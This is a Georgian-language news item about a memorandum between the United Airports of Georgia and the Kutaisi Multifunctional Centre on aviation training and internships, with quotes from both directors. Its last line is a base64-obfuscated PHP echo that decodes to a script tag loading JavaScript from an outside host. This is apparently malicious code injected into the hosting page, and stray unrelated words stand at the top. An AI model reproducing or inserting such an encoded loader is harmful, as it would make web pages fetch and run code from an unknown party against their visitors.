celsiusi
ავერსი შნაიდერი

 საქართველოს აეროპორტების გაერთიანებასა და ქუთაისის მულტიფუნქციურ ცენტრს შორის ურთიერთთანამშრომლობის მემორანდუმი გაფორმდა. დოკუმენტს ხელი, ქუთაისის საერთაშორისო აეროპორტში, აეროპორტების გაერთიანების გენერალურმა დირექტორმა ირაკლი ქარქაშაძემ და მულტიფუნქციური ცენტრის დირექტორმა ნატალია პატარიძემ მოაწერეს.

როგორც საქართველოს აეროპორტების გაერთიანების მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, ეს არის პირველი მემორანდუმი, რომელიც ახალდაარსებულმა მულტიფუნქციურმა ცენტრმა გააფორმა.

მათივე ცნობით, მემორანდუმის მიზანია, არაფორმალური მომზადება-გადამზადების საგანმანათლებლო პროგრამის ხელშეწყობის კუთხით თანამშრომლობა და გამოცდილების გაზიარება. პირველ ეტაპზე, აეროპორტების გაერთიანება მულტიფუნქციური ცენტრის სტუდენტებისთვის, შეიმუშავებს „საჰაერო ტრანსპორტით გადაყვანა-გადაზიდვის ორგანიზების“ სასწავლო კურსს, რომლის წარმატებით დასრულების შემთხვევაში, სტუდენტები სტაჟირებას ქუთაისის საერთაშორისო აეროპორტში გაივლიან.

,,საქართველოს აეროპორტების გაერთიანებასა და ქუთაისის მულტიფუნქციურ ცენტრს შორის დღეს გაფორმდა ურთიერთთანამშრომლობის მემორანდუმი, რომელიც მიზნად ისახავს არაფორმალური განათლების პროფესიული და დარგობრივი კურსების შეთავაზებას დაინტერესებული პირებისათვის. ერთის მხრივ, საქართველოს აეროპორტების გაერთიანება დაეხმარება ცენტრს შექმნას სწორი სილაბუსი და გააცნოს ავიაციის ძირითადი პრინციპები ყველა დაინტერესებულ პირს, ხოლო მეორეს მხრივ, ჩვენ შევთავაზებთ მათ დასაქმებას. აღნიშნული თანამშრომლობა არის ძალიან მნიშვნელოვანი, გამომდინარე იქიდან რომ საავიაციო ინდუსტრია მნიშვნელოვნად განიცდის კადრების დეფიციტს, ეს გახლავთ მაღალი კვალიფიკაციის მქონე ინდუსტრია და ჩვენ ყოველთვის ვზრუნავთ იმაზე, რომ მუდმივად ხდებოდეს ახალი კადრების მომზადება და მათთვის დასაქმებისა და ვაკანსიების შეთავაზება“,- განაცხადა ირაკლი ქარქაშაძემ.

მათივე ცნობით, მემორანდუმის თანახმად, აეროპორტების გაერთიანება და ქუთაისის მულტიფუნქციური ცენტრი, თანხმდებიან შეუწყონ იმერეთის რეგიონში საავიაციო ინდუსტრიისა და მასთან დაკავშირებული პროფესიების პოპულარიზაციას და ამ მიმართულებით, არაფორმალური მომზადება-გადამზადების სასწავლო პროგრამის განვითარებას.

“ქუთაისის მულტიფუნქციურმა ცენტრმა დღეს ოფიციალურად დაიწყო საქართველოს აეროპორტების გაერთიანებასთან თანამშრომლობა. ეს თანამშრომლობა ხელს შეუწყობს არაფორმალური მომზადება/გადამზადების პროფესიული კურსების დანერგვას ქუთაისის მულტიფუნქციური ცენტრის ბაზაზე. მნიშვნელოვანია ამ დარგის პოპულარიზაცია, რადგანაც ქუთაისის საერთაშორისო აეროპორტმა ძალიან მნიშვნელოვანი როლი შეასრულა ქუთაისის და მთლიანად, იმერეთის რეგიონის ტურიზმის ფუნქციის განვითარებაში და ჩვენ ჩვენის მხრივ ამ დარგს პოპულარიზაციას ამ ფორმით შევუწყობთ ხელს“, - განაცხადა ქუთაისის მულტიფუნქციური ცენტრის დირექტორმა, ნატალია პატარიძემ.

ქუთაისის მულტიფუნქციური ცენტრი ახლახან დაარსდა და მისი მთავარი საგანმანათლებლო დარგები ტექნოლოგიები, ინფორმაციული ტექნოლოგიები, ხელოვნური ინტელექტი, ავიაცია და ტურიზმი იქნება.

169
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");